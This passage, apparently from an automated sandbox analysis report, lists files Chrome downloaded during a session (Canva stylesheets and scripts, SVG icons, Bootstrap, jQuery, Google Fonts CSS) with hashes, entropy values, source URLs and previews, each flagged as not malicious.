                                                                                                                                                                                                                                                                    SSDEEP:768:riPrsbOBOGATBfjXgwupAZ6g2J9k0WbTzEinKsJmka/c0SlPbNr2lkBFWdtCDuhy:OPrkGAlrsG6g2Jurb56FgRylAasDPgs
                                                                                                                                                                                                                                                                    MD5:50B1A5FE2E4312D1CD628E6138ACB47C
                                                                                                                                                                                                                                                                    SHA1:B615A2B6FF9E49EDD41A5062C7C0FA93331AE6F9
                                                                                                                                                                                                                                                                    SHA-256:43E559C0D7C2F5C36B1F48625FAEA9F64F524A3CF67218AFF8A5063618ED013A
                                                                                                                                                                                                                                                                    SHA-512:0E6F1A66E8E6E9A25CDAF0071E866F861A7AC40B8D2B6FE898AB46AF6D4070B0A313AB6BB7261F6D1024E1C1CC3000E6ACB1BF816A585A18EF8C8A906C186D19
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...@...?......".C....sRGB........OIDATx...1......7....2.....@.............i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.....&.....H.X......,...........i......4.....@...... M`.......... ..i.(..........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X......,...........k......5............`M`.....&.....X.X.c............0....`M`.....&.....X.X......,.........
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):28
                                                                                                                                                                                                                                                                    Entropy (8bit):4.137537511266052
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:G4iC1Y:ziC1Y
                                                                                                                                                                                                                                                                    MD5:C41A026A97DFC107025EEC7F45F29C85
                                                                                                                                                                                                                                                                    SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                                                                                                                                                                                                                                                                    SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                                                                                                                                                                                                                                                                    SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmp5gxDEPM4AxIFDVNVgbUSBQ2tCa6x?alt=proto
                                                                                                                                                                                                                                                                    Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):2725
                                                                                                                                                                                                                                                                    Entropy (8bit):4.001613792451738
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:/a93XK82dedc1J2ghyVSuW2oyhTn2oXU/JS1QwppLYA8n9V7KRSpHW3SdjUjuq:onvcH2wyVSutoqnHWSK4tLYVHH8CEuq
                                                                                                                                                                                                                                                                    MD5:749002F5A04F784CC1802D77D2FED423
                                                                                                                                                                                                                                                                    SHA1:A82F9B14C9946185D475C946B2EA4B1D724732F7
                                                                                                                                                                                                                                                                    SHA-256:E26E8402DEA748478ED971DD8F9626BBC25CEC4776D92A0B768D71A109F82C87
                                                                                                                                                                                                                                                                    SHA-512:883CD33B1406E297B068E93CA509E38A54197BC426766AEF6F79D66BCDA96C172E144D302AF174D2D1FEB58091F9FA13139D80B65B9068D58D0A47F83999E9EB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/749002f5a04f784cc1802d77d2fed423.svg
                                                                                                                                                                                                                                                                    Preview:<svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.808 31.921c0 .963.252 1.612.895 1.612 1.102 0 2.189-2.995 2.189-4.692 0-.762-.202-1.387-.729-1.387-1.211 0-2.355 2.797-2.355 4.467zm22.347-5.011c0 .55.139 1.172.521 1.629.172-.501.415-1.502.415-2.184 0-.408-.09-.701-.388-.701-.3 0-.548.574-.548 1.255zm4.603 5.011c0 .868.252 1.612.891 1.612 1.12 0 2.19-2.995 2.19-4.692 0-.77-.19-1.387-.717-1.387-1.221 0-2.364 2.853-2.364 4.467z" fill="#fff"/><path fill-rule="evenodd" clip-rule="evenodd" d="M60 30c0 16.569-13.431 30-30 30C13.431 60 0 46.569 0 30 0 13.431 13.431 0 30 0c16.569 0 30 13.431 30 30zm-6.515 1.462c.035-.106.106-.16.186-.16.178 0 .329.217.329.569 0 1.333-1.38 2.956-2.968 2.956-1.016 0-1.567-.726-1.783-1.724-.655 1.108-1.51 1.736-2.568 1.736-.972 0-2.097-.66-2.097-3.024 0-.818.174-1.638.468-2.388-.694.492-1.42.507-1.9.445-1.228 2.547-3.258 4.95-4.4 4.95-.928 0-1.524-1.751-1.799-3.92-.88 2.323-2.198 3.91-3.495 3.91-1.17 0-1.7
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1507)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1570
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6795621726658965
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:iO+loRq6mWVNIWtWeNCQ9IVsWruoImafH5OdCOyI6uLI:iOW3WzqB8IFXQyI
                                                                                                                                                                                                                                                                    MD5:EFC6909FC59746B60DE7154E288A4654
                                                                                                                                                                                                                                                                    SHA1:8981F96DFEDFB44B1EAA326426EA1E1320DB279B
                                                                                                                                                                                                                                                                    SHA-256:72DFA4CED29F3B31ED2CDB78A2219EDB6B03E070EA269BFF0D48C778FFB53E30
                                                                                                                                                                                                                                                                    SHA-512:46A4EF208C5326E4082D011951FB846B3F41F134A6406C80D7CF88AD01BB877B21A686EBF1C93047D92DAE0F078947C4798AAE942F11F118E409F09945B5CFCE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/93584becc156c1fd.ltr.css
                                                                                                                                                                                                                                                                    Preview:.dkWypw{align-items:center;box-sizing:border-box;display:inline-flex}.dkWypw:before{content:"\00200B";line-height:1;width:0}.dkWypw>svg{display:block;height:100%;width:100%}.R3BUpw{height:12px;width:12px}.uRWxVA{height:16px;width:16px}.NA_Img{height:24px;width:24px}.JRkz2A{height:32px;width:32px}@keyframes _vsOSw{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}._6ti9_A{animation:_vsOSw .5s linear infinite}[dir=rtl] .lmfTqA{transform:scaleX(-1)}.RMcv3A{color:var(--VNXpSw)}.M1IlTw{color:var(--5F8MFw)}.EpS93g{color:var(--JEAqPw)}._7_8FQQ{color:var(--P69qRQ)}.Tb7P_g{color:var(--bk41Zw)}._682gpw{-webkit-touch-callout:none;-webkit-user-drag:none;-webkit-tap-highlight-color:transparent}._7vS1Yw{-webkit-user-select:none;user-select:none}.light{--QpnZJg:0.07;--pWZ5jw:0.025}.dark{--QpnZJg:0.15;--pWZ5jw:0.10}@keyframes HrpoWA{0%{opacity:var(--QpnZJg)}25%{opacity:var(--pWZ5jw)}50%{opacity:var(--QpnZJg)}to{opacity:var(--QpnZJg)}}.n7vSfw{background:var(--VNXpSw);opacity:var(--QpnZJg)}.S_ZkxQ{a
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2507)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):2570
                                                                                                                                                                                                                                                                    Entropy (8bit):5.355069381081724
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:4lYiblnRA1snu07yz9VSESG01Vle4VZbNMOw/ClLDKWF:vyRFnJIq1VBTw/yLDLF
                                                                                                                                                                                                                                                                    MD5:3F803F8228FDE27FE250AD1894FBC288
                                                                                                                                                                                                                                                                    SHA1:E349858897D949C96324E5098A50868C575403D7
                                                                                                                                                                                                                                                                    SHA-256:125F8BBFF864C97E6CE60A9AE1A18C6087355C3B59DD8898F62492F20217C766
                                                                                                                                                                                                                                                                    SHA-512:E00B5ACA04AA0366916797AE93C9E05A6B55244591946190C4429D6D6F3117BEEEC9EA3017A981F10A2DF30AF2A9C0E7EF793F18DBA4C50E8A365B2C236D7843
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/de775bd2724d720f.ltr.css
                                                                                                                                                                                                                                                                    Preview:._2Cfibw{align-items:center;background-color:var(--olfr3Q);bottom:0;display:flex;justify-content:center;left:0;opacity:0;overflow-y:auto;position:fixed;right:0;top:0}._2Cfibw.Ue5QFA{transition:opacity .25s ease-in-out}._2Cfibw.SCu3NA{position:absolute}._2Cfibw.FFYPwA{background-color:rgba(13,18,22,.7)}._2Cfibw.Wwu0TA{background-color:rgba(0,0,0,.9)}._2Cfibw.AD_uww{-webkit-backdrop-filter:blur(4px);backdrop-filter:blur(4px)}._2Cfibw.qm8y8Q{-webkit-backdrop-filter:blur(14px);backdrop-filter:blur(14px)}._2Cfibw.FijAlA{opacity:1}._1PHgrg{box-sizing:border-box;display:flex;margin:auto 0;max-width:100%;padding:16px 48px;pointer-events:none;transform:scale(.8);will-change:transform}._1PHgrg.FijAlA{transform:scale(1)}.Ue5QFA ._1PHgrg{transition:transform .25s ease-in-out}.DLRQ_Q{border-radius:16px;flex:1;max-width:100%;outline-offset:2px;pointer-events:auto}.DLRQ_Q.oLYBEA{flex:initial;height:100%}.DLRQ_Q.CdyDCQ{outline:none}.LBYU2A{align-self:flex-start;margin-right:-48px;order:1;padding:0 8px
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65325)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):144877
                                                                                                                                                                                                                                                                    Entropy (8bit):5.049937202697915
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                                                                                                                                                                                                                                                                    MD5:450FC463B8B1A349DF717056FBB3E078
                                                                                                                                                                                                                                                                    SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                                                                                                                                                                                                                                    SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                                                                                                                                                                                                                                    SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                                                                                                                                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):271751
                                                                                                                                                                                                                                                                    Entropy (8bit):5.0685414131801165
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
                                                                                                                                                                                                                                                                    MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                                                                                                                                                                                                                                                    SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                                                                                                                                                                                                                                                    SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                                                                                                                                                                                                                                                    SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):205770
                                                                                                                                                                                                                                                                    Entropy (8bit):5.280944208455833
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:xRuYsuJpRRFqGTljz2zheWjMsoWuZe+qn1oWR9pvu:rpRR0GTl/2MWAsopsr1Rru
                                                                                                                                                                                                                                                                    MD5:AF2FE7BB481ACFBD2A36BC7510332BF4
                                                                                                                                                                                                                                                                    SHA1:49907978018F91904F23318040D9CD818B9155FD
                                                                                                                                                                                                                                                                    SHA-256:A721EA558E145AEA18DB697C9EECE393958C05E2031DFACC07994616D3CDB936
                                                                                                                                                                                                                                                                    SHA-512:DDEFE45FFD6F38E03564FB97CDA2E071C50571F3D24C51A40CBBB5D4C219DD2810384689EDFABC3C9507D1B2485458DE772823C1C584ECC4DFA14C9800AA5F91
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/4af0e43f4ef393f1.vendor.js
                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 4af0e43f4ef393f1.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{40749:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(366995);function a(e){var t=e.children,n=e.render,a=t||n;return"function"!=typeof a?null:(0,r.S)(a)}a.displayName="Observer"},736241:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,Qj:()=>s.Q,fv:()=>c.f,jd:()=>l.O});n(454648);var r,a=n(404935),i=n(695578),o=(n(366995),n(775328)),l=n(751586),u=n(364620),s=n(40749),c=n(818321);n(948591),n(24765);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},364620:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(775328),l=n(366995),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function"==typeof i.forwardRef&&(0,i.forwardRef)((function(e){return null})).$$typeof,f=u?Symbol.for("react.memo")
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):842
                                                                                                                                                                                                                                                                    Entropy (8bit):4.957424326112546
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:tzBXuJlRGZ6vzSiMEjeK7IhdHxsGJcGmBe:ju843M/JhdH9J3mBe
                                                                                                                                                                                                                                                                    MD5:3A05DBF1CDD156FCD1677A0B444CC36F
                                                                                                                                                                                                                                                                    SHA1:4DBD36F62A617F47B69FB2D5F83BF0FE36ECE44A
                                                                                                                                                                                                                                                                    SHA-256:4C122BDEABCF8A8C613B81B5B881469574DAA61B870651D9F06D0F81B4405271
                                                                                                                                                                                                                                                                    SHA-512:CE05D3A04F285E246AC43798C384674FB5D292CEA0911CACFD6A7E10772C77B6997D5ED50BF298DDBB6096A02D06BC1E01324C1A35623E07834C8AFC63D536E6
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0s16 7.163 16 16Z" fill="url(#_1562409365__a)"/><path d="M12.235 12.235c0 1.56-.903 2.824-2.017 2.824-1.114 0-2.017-1.264-2.017-2.824 0-1.56.903-2.823 2.017-2.823 1.114 0 2.017 1.264 2.017 2.823ZM23.53 12.047c0 1.456-.843 2.635-1.883 2.635s-1.882-1.18-1.882-2.635c0-1.455.843-2.635 1.882-2.635 1.04 0 1.882 1.18 1.882 2.635ZM19.765 22.588c0 2.6-1.687 4.706-3.765 4.706-2.08 0-3.765-2.105-3.765-4.706 0-2.598 1.685-4.706 3.765-4.706 2.078 0 3.765 2.108 3.765 4.706Z" fill="#664500"/><defs><linearGradient id="_1562409365__a" x1="16" y1="32" x2="16" y2="0" gradientUnits="userSpaceOnUse"><stop stop-color="#FFCC4D"/><stop offset="1" stop-color="#FFDF8E"/></linearGradient></defs></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):641
                                                                                                                                                                                                                                                                    Entropy (8bit):4.9079451292395095
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:m1l1fX1sHcXd+1NOH44KHYP4Ax5lWcx4uiGo45V4MtizGK1V4+BW44c/ac4GHzVG:yrdmcXd6NOH44KHy4AtWcx4Wo45V42iK
                                                                                                                                                                                                                                                                    MD5:07254CD7D8E452943780B1BAE736704B
                                                                                                                                                                                                                                                                    SHA1:15EE35ACEFDCBBC36C54A9FD5579E5CBB06546C9
                                                                                                                                                                                                                                                                    SHA-256:376633F276260A114D586216911005AF76A989E3FF049D3641302D7211CA6E4A
                                                                                                                                                                                                                                                                    SHA-512:C3D47BDAA9A09003CEBAFD689FF88EF7B3A35A3DED0F043686D75C4E21F86CC43C9A023B4B1B56AC028741C8771DDAA44123490CFADF0C6A31A7116FB42078D8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/bc9c3915a07295cb.en.js
                                                                                                                                                                                                                                                                    Preview:window['cmsg']['assets'] = window['cmsg']['assets'] || {};.window['cmsg']['assets']["en"] = Object.assign(window['cmsg']['assets']["en"] || {}, {"158":{"js":["9f45295e288f7b33.strings.js"],"css":[]},"1008":{"js":["353a3cba55bfa046.strings.js"],"css":[]},"2063":{"js":["ddc3ba95d26179c9.strings.js"],"css":[]},"4085":{"js":["fe0857dd958df633.strings.js"],"css":[]},"4436":{"js":["73112b4e8057cf9b.strings.js"],"css":[]},"6037":{"js":["dad3364637d681fb.strings.js"],"css":[]},"7157":{"js":["e0c33afc52136d6f.strings.js"],"css":[]},"8212":{"js":["80e59963e6d576e3.strings.js"],"css":[]},"8854":{"js":["bebb780dc550bde0.strings.js"],"css":[]}});
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (827)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):890
                                                                                                                                                                                                                                                                    Entropy (8bit):5.535500471363475
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:axUzOUw2+Y5nhFTKzsLrH7CJjJrbNCwb+G0TNJ1TezV+r+SVwPqS8Hmh/lsMz8Z:gW5hFWarH7yrbbcJLTc8+SCB8Hmf4
                                                                                                                                                                                                                                                                    MD5:9A71130B0D652297E0A403E7E62D7F12
                                                                                                                                                                                                                                                                    SHA1:E8FE6179FDBEEC5291A12D219708685AA5196BC1
                                                                                                                                                                                                                                                                    SHA-256:F908A0069E1601E14517E1E6296DA56B0FB0FCC3AEA6863C6AE23C5E1FE17878
                                                                                                                                                                                                                                                                    SHA-512:4E35EB1804787EA777E2B6CC7A8815AACAB5CC9F675B572238D8AA3A8EA37D441D4D026A099A3088882A516E92353F3E68471D95C6FAA72F2DDEA444A5CEB62D
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/319bbcd1cecdb6ee.ltr.css
                                                                                                                                                                                                                                                                    Preview:.ZP8HvQ{position:relative}.Szyxww{opacity:1;position:absolute;top:0;width:100%}.CqPOew,.afMSnQ{opacity:0}.JRm_PQ{opacity:1}.Szyxww,.afMSnQ{transition:opacity .1s ease-in-out}._2trolg .Szyxww,._2trolg .afMSnQ{transition:opacity .7s cubic-bezier(.4,0,.2,1)}.oDHgrA{height:100%;width:100%}.Ba_zvQ{display:flex;flex:1;min-height:0;min-width:0;width:100%}._4C1vIA>.YL_ApQ,._4C1vIA>.qqCHKg{transition:opacity .3s ease-in-out}.gWeP3g,.qqCHKg{opacity:0}.YL_ApQ{opacity:1}.pOll6Q>.gum40Q{display:none}.g1T5pQ>.gum40Q{visibility:hidden}.epgNPA{width:100%}.NvaaRg{overflow:hidden}.epgNPA._3pVd7A{display:flex}.KhPLRA{display:grid;grid-template-areas:"content";grid-template-columns:1fr;grid-template-rows:1fr;position:relative}.DiwaPA,.DiwaPA>.KhPLRA{height:100%;max-height:100%}._3pVd7A,._3pVd7A>.KhPLRA{flex:1}.T3uz5Q{grid-area:content}./*# sourceMappingURL=sourcemaps/319bbcd1cecdb6ee.ltr.css.map*/
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):5973
                                                                                                                                                                                                                                                                    Entropy (8bit):5.393222621370193
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:ZOxMMNJOxMMmvFZ8OxMM4OxMMVYOxMMxOxMM9y+aZjzBrWOxMMjubqGIFuV4UOxO:eNumjvVPm9qxSbqGIwV4751Mh
                                                                                                                                                                                                                                                                    MD5:84B4D2FB3E351B07EB44BE9076C40C3F
                                                                                                                                                                                                                                                                    SHA1:F798336EF7F04FB213B51E7D32686B8E682ADAD9
                                                                                                                                                                                                                                                                    SHA-256:1C93A9EC1B17079D7F97C8176C2AB7807D10C133EFDD87FE2CCC233B152CA399
                                                                                                                                                                                                                                                                    SHA-512:8A307DCC1D60710FACB22BE693AFE2FFBFD332513FAD153EEAD776DED703A365F494FB1B46B8BCF00D382523C4B8BCA1E93612ED307519C5DF709375132D03F8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                                                                                                                                                                                                                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13961)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):14024
                                                                                                                                                                                                                                                                    Entropy (8bit):5.663903816058623
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:VHmZfrxWVRLVAFVJrC5LJpttqrYICdm0gkVWOPZ3tT9TaWkN:QUAFnr+JpHqyES3h9TdkN
                                                                                                                                                                                                                                                                    MD5:FAA6BF6BE6DCF1172425616A752E665A
                                                                                                                                                                                                                                                                    SHA1:952D0CE7550459FCB0F85212E7CB6969CDFADECF
                                                                                                                                                                                                                                                                    SHA-256:E67474B6D8CEC060C00EB1C126AD4187AE715B015E62010D39DBB2A9023E0FE7
                                                                                                                                                                                                                                                                    SHA-512:C454840DD577BC0C93DAE90DE951419A24F44C14666BCF3AD01290218E51AB846C0F77D481EDAB039B87C000FBDE707A3ED9D0D290A15127282A8434AC3B2C04
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/c3c941edff432236.ltr.css
                                                                                                                                                                                                                                                                    Preview:.BMOCzQ{border:0;box-sizing:border-box;list-style:none;margin:0;padding:0}.Nuu2Ig{justify-content:normal}.MYb60A{justify-content:center}.TjbMBg{justify-content:start}._WIyVQ{justify-content:flex-start}.Q8_z9Q{justify-content:end}.YgHDng{justify-content:flex-end}._1lVsiA{justify-content:space-between}.XJKpHg{align-items:stretch}.FQ64gg{align-items:center}.k3y7hg{align-items:start}.My5POw{align-items:flex-start}.YnRqTQ{align-items:end}.qF5pUA{align-items:flex-end}.ZoItOA{align-self:stretch}.F3q9DQ{align-self:center}.S_apYQ{align-self:start}.j0D3Ew{align-self:flex-start}.Q_CMqA{align-self:end}.hL0dIg{align-self:flex-end}.light{--xpFk1A:#f6f7f8}.dark{--xpFk1A:hsla(0,0%,100%,.15)}.x1Lyuw{background-image:linear-gradient(45deg,var(--xpFk1A) 25%,transparent 25%),linear-gradient(-45deg,var(--xpFk1A) 25%,transparent 25%),linear-gradient(45deg,transparent 75%,var(--xpFk1A) 75%),linear-gradient(-45deg,transparent 75%,var(--xpFk1A) 75%);background-position:0 0,0 8px,8px -8px,-8px 0;background-size
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
